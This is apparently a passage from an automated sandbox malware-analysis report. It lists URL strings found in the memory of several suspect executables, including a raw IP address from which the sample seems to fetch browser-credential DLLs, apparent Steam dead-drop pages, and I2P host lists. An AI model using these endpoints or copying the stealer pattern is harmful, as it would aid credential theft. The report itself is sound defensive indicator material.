Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395376073.000000001B579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr	String found in binary or memory: http://identiguy.i2p/hosts.txt
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395376073.000000001B579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395376073.000000001B579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, KXEmxT2p.23.dr	String found in binary or memory: http://reg.i2p/hosts.txt
Source: main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://reg.i2p/hosts.txt7t
Source: main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://reg.i2p/hosts.txtcc
Source: main.exe, 00000017.00000002.3441085501.000001E399027000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://reg.i2p/hosts.txtvp/p_lib.c
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr	String found in binary or memory: http://rus.i2p/hosts.txt
Source: main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, KXEmxT2p.23.dr	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt
Source: main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtxyz/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr	String found in binary or memory: http://stats.i2p/cgi-bin/newhosts.txt
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.13.dr	String found in binary or memory: http://upx.sf.net
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B56D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, file.exe, 00000000.00000002.2788158189.000000006C85D000.00000002.00000001.01000000.00000008.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: file.exe, 00000000.00000002.2768266325.000000001B807000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2767527727.00000000191FD000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2761033099.0000000000607000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://5.75.212.60
Source: file.exe, 00000000.00000003.2269115043.00000000024FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361797117.000000001B53B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395488232.000000001B541000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373150785.000000001B560000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373328753.000000001B536000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373854371.000000001B562000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2374176714.000000001B564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/
Source: file.exe, 00000000.00000003.2373328753.000000001B536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/#
Source: file.exe, 00000000.00000003.2395488232.000000001B541000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373328753.000000001B536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60//
Source: file.exe, 00000000.00000003.2269115043.00000000024FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60//S
Source: file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/0
Source: file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/2
Source: file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/4
Source: file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/5
Source: file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/5.212.60/
Source: file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/5.212.60/nss3.dll
Source: file.exe, 00000000.00000003.2361797117.000000001B53B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/6
Source: file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/;
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/A
Source: file.exe, 00000000.00000003.2269115043.00000000024FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/B_F
Source: file.exe, 00000000.00000003.2373150785.000000001B560000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373854371.000000001B562000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/EGIDHDHIDG
Source: file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/H
Source: file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395414511.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373150785.000000001B560000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2373854371.000000001B562000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2374176714.000000001B564000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/ata
Source: file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/e
Source: file.exe, 00000000.00000003.2395488232.000000001B541000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768054750.000000001B536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/freebl3.dll
Source: file.exe, 00000000.00000003.2395488232.000000001B541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/freebl3.dllE
Source: file.exe, 00000000.00000003.2395488232.000000001B541000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768054750.000000001B536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/freebl3.dllh
Source: file.exe, 00000000.00000003.2395488232.000000001B541000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/freebl3.dlls
Source: file.exe, 00000000.00000003.2269115043.00000000024FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/licies
Source: file.exe, 00000000.00000002.2768054750.000000001B536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/mozglue.dll
Source: file.exe, 00000000.00000002.2768054750.000000001B536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/mozglue.dlls
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/msvcp140.dll
Source: file.exe, 00000000.00000002.2768054750.000000001B536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/nss3.dll
Source: file.exe, 00000000.00000002.2768054750.000000001B536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/nss3.dlle
Source: file.exe, 00000000.00000003.2269115043.00000000024FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/ows
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/softokn3.dll
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/softokn3.dllnXq
Source: file.exe, 00000000.00000002.2761033099.000000000052A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2762253914.00000000024F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/sqls.dll
Source: file.exe, 00000000.00000002.2768054750.000000001B4F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/vcruntime140.dll
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://5.75.212.60/vcruntime140.dll;
Source: file.exe, 00000000.00000002.2761033099.0000000000607000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://5.75.212.60art/form-data;
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://banana.incognet.io/
Source: file.exe, 00000000.00000002.2767835795.0000000019760000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768175135.000000001B55F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2722820114.000000001B55F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000002.2767835795.0000000019760000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768175135.000000001B55F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2722820114.000000001B55F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=eZOyL2UG5OX8&a
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269115043.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269115043.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=3eYWCMu_
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269115043.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=e0OV
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
